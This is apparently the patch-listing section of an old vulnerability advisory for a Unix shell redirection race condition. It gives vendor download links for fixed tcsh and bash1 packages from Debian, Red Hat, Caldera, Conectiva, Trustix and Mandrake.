Conectiva ecommerce i386 tcsh-6.09.00-7cl
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/tcsh-6. 09.00-7cl.i386.rpm -
Conectiva graficas i386 tcsh-6.09.00-7cl
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/tcsh-6.0 9.00-7cl.i386.rpm -
Debian 2.2 (Intel): tcsh-kanji_6.09.00-10
http://security.debian.org/dists/stable/updates/main/binary-i386/tcsh- kanji_6.09.00-10_i386.deb -
Debian 2.2 (Intel): tcsh_6.09.00-10
http://security.debian.org/dists/stable/updates/main/binary-i386/tcsh_ 6.09.00-10_i386.deb -
Debian 2.2 (m68k): tcsh-kanji_6.09.00-10
http://security.debian.org/dists/stable/updates/main/binary-m68k/tcsh- kanji_6.09.00-10_m68k.deb -
Debian 2.2 (m68k): tcsh_6.09.00-10
http://security.debian.org/dists/stable/updates/main/binary-m68k/tcsh_ 6.09.00-10_m68k.deb -
Debian 2.2 (ppc): tcsh-kanji_6.09.00-10
http://security.debian.org/dists/stable/updates/main/binary-powerpc/tc sh-kanji_6.09.00-10_powerpc.deb -
Debian 2.2 (ppc): tcsh_6.09.00-10
http://security.debian.org/dists/stable/updates/main/binary-powerpc/tc sh_6.09.00-10_powerpc.deb -
Debian 2.2 (Sparc): tcsh-kanji_6.09.00-10
http://security.debian.org/dists/stable/updates/main/binary-sparc/tcsh -kanji_6.09.00-10_sparc.deb -
Debian 2.2 (Sparc): tcsh_6.09.00-10
http://security.debian.org/dists/stable/updates/main/binary-sparc/tcsh _6.09.00-10_sparc.deb -
Debian 2.2 alpha tcsh-kanji_6.09.00-10_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/tcsh -kanji_6.09.00-10_alpha.deb -
Debian 2.2 alpha tcsh_6.09.00-10_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/tcsh _6.09.00-10_alpha.deb -
Debian 2.2 arm tcsh-kanji_6.09.00-10_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/tcsh-k anji_6.09.00-10_arm.deb -
Debian 2.2 arm tcsh_6.09.00-10_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/tcsh_6 .09.00-10_arm.deb -
Trustix 1.0/1.1 tcsh-6.09-5tr.i586
ftp://ftp.trustix.net/pub/Trustix/updates/tcsh-6.09-5tr.i586.rpm
tcsh tcsh 6.9 .00
-
Caldera eDesktop 2.4: tcsh-6.10.00-2
ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/RPMS/tcs h-6.10.00-2.i386.rpm -
Caldera eDesktop 2.4: tcsh-doc-html-6.10.00-2
ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/RPMS/tcs h-doc-html-6.10.00-2.i386.rpm -
Caldera eServer 2.3/eBuilder 3.0: tcsh-6.10.00-2
ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/RPMS/tcsh -6.10.00-2.i386.rpm -
Caldera eServer 2.3/eBuilder 3.0: tcsh-doc-html-6.10.00-2
ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/RPMS/tcsh -doc-html-6.10.00-2.i386.rpm -
Caldera OpenLinux 2.3 tcsh-6.10.00-2
ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3/current/RPMS/tc sh-6.10.00-2.i386.rpm -
Caldera OpenLinux 2.3: tcsh-doc-html-6.10.00-2
ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3/current/RPMS/tc sh-doc-html-6.10.00-2.i386.rpm -
Debian 2.2 (Intel): tcsh-kanji_6.09.00-10
http://security.debian.org/dists/stable/updates/main/binary-i386/tcsh- kanji_6.09.00-10_i386.deb -
Debian 2.2 (Intel): tcsh_6.09.00-10
http://security.debian.org/dists/stable/updates/main/binary-i386/tcsh_ 6.09.00-10_i386.deb -
Debian 2.2 (m68k): tcsh-kanji_6.09.00-10
http://security.debian.org/dists/stable/updates/main/binary-m68k/tcsh- kanji_6.09.00-10_m68k.deb -
Debian 2.2 (m68k): tcsh_6.09.00-10
http://security.debian.org/dists/stable/updates/main/binary-m68k/tcsh_ 6.09.00-10_m68k.deb -
Debian 2.2 (ppc): tcsh-kanji_6.09.00-10
http://security.debian.org/dists/stable/updates/main/binary-powerpc/tc sh-kanji_6.09.00-10_powerpc.deb -
Debian 2.2 (ppc): tcsh_6.09.00-10
http://security.debian.org/dists/stable/updates/main/binary-powerpc/tc sh_6.09.00-10_powerpc.deb -
Debian 2.2 (Sparc): tcsh-kanji_6.09.00-10
http://security.debian.org/dists/stable/updates/main/binary-sparc/tcsh -kanji_6.09.00-10_sparc.deb -
Debian 2.2 (Sparc): tcsh_6.09.00-10
http://security.debian.org/dists/stable/updates/main/binary-sparc/tcsh _6.09.00-10_sparc.deb -
Debian 2.2 alpha tcsh-kanji_6.09.00-10_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/tcsh -kanji_6.09.00-10_alpha.deb -
Debian 2.2 alpha tcsh_6.09.00-10_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/tcsh _6.09.00-10_alpha.deb -
Debian 2.2 arm tcsh-kanji_6.09.00-10_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/tcsh-k anji_6.09.00-10_arm.deb -
Debian 2.2 arm tcsh_6.09.00-10_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/tcsh_6 .09.00-10_arm.deb -
Kris Kennaway
tcsh.patch
http://www.securityfocus.com/data/vulnerabilities/patches/tcsh.patch -
Red Hat Inc. 5.2 alpha tcsh-6.10-0.5.x
ftp://updates.redhat.com/5.2/alpha/tcsh-6.10-0.5.x.alpha.rpm -
Red Hat Inc. 5.2 i386 tcsh-6.10-0.5.x
ftp://updates.redhat.com/5.2/i386/tcsh-6.10-0.5.x.i386.rpm -
Red Hat Inc. 5.2 sparc tcsh-6.10-0.5.x
ftp://updates.redhat.com/5.2/sparc/tcsh-6.10-0.5.x.sparc.rpm -
Red Hat Inc. 6.0 alpha tcsh-6.10-0.6.x
ftp://updates.redhat.com/6.0/alpha/tcsh-6.10-0.6.x.alpha.rpm -
Red Hat Inc. 6.0 i386 tcsh-6.10-0.6.x
ftp://updates.redhat.com/6.0/i386/tcsh-6.10-0.6.x.i386.rpm -
Red Hat Inc. 6.0 sparc tcsh-6.10-0.6.x
ftp://updates.redhat.com/6.0/sparc/tcsh-6.10-0.6.x.sparc.rpm -
Red Hat Inc. 6.1 alpha tcsh-6.10-0.6.x
ftp://updates.redhat.com/6.1/alpha/tcsh-6.10-0.6.x.alpha.rpm -
Red Hat Inc. 6.1 i386 tcsh-6.10-0.6.x
ftp://updates.redhat.com/6.1/i386/tcsh-6.10-0.6.x.i386.rpm -
Red Hat Inc. 6.1 sparc tcsh-6.10-0.6.x
ftp://updates.redhat.com/6.1/sparc/tcsh-6.10-0.6.x.sparc.rpm -
Red Hat Inc. 6.2 alpha tcsh-6.10-0.6.x
ftp://updates.redhat.com/6.2/alpha/tcsh-6.10-0.6.x.alpha.rpm -
Red Hat Inc. 6.2 i386 tcsh-6.10-0.6.x
ftp://updates.redhat.com/6.2/i386/tcsh-6.10-0.6.x.i386.rpm -
Red Hat Inc. 6.2 sparc tcsh-6.10-0.6.x
ftp://updates.redhat.com/6.2/sparc/tcsh-6.10-0.6.x.sparc.rpm -
Red Hat Inc. 7.0 alpha tcsh-6.10-1
ftp://updates.redhat.com/7.0/alpha/tcsh-6.10-1.alpha.rpm -
Red Hat Inc. 7.0 i386 tcsh-6.10-1
ftp://updates.redhat.com/7.0/i386/tcsh-6.10-1.i386.rpm -
Trustix 1.0/1.1 tcsh-6.09-5tr.i586
ftp://ftp.trustix.net/pub/Trustix/updates/tcsh-6.09-5tr.i586.rpm
Mandriva Linux Mandrake 7.1
-
MandrakeSoft 7.1 i386 bash1-1.14.7-21.1mdk.i586.rpm
http://sunsite.ualberta.ca/pub/Mirror/Linux/mandrake/updates/7.1/RPMS/ bash1-1.14.7-21.1mdk.i586.rpm
Mandriva Linux Mandrake 7.2
-
MandrakeSoft 7.2 i386 bash1-1.14.7-24.1mdk.i586.rpm
http://sunsite.ualberta.ca/pub/Mirror/Linux/mandrake/updates/7.2/RPMS/ bash1-1.14.7-24.1mdk.i586.rpm
References
Unix Shell Redirection Race Condition Vulnerability
References:
References: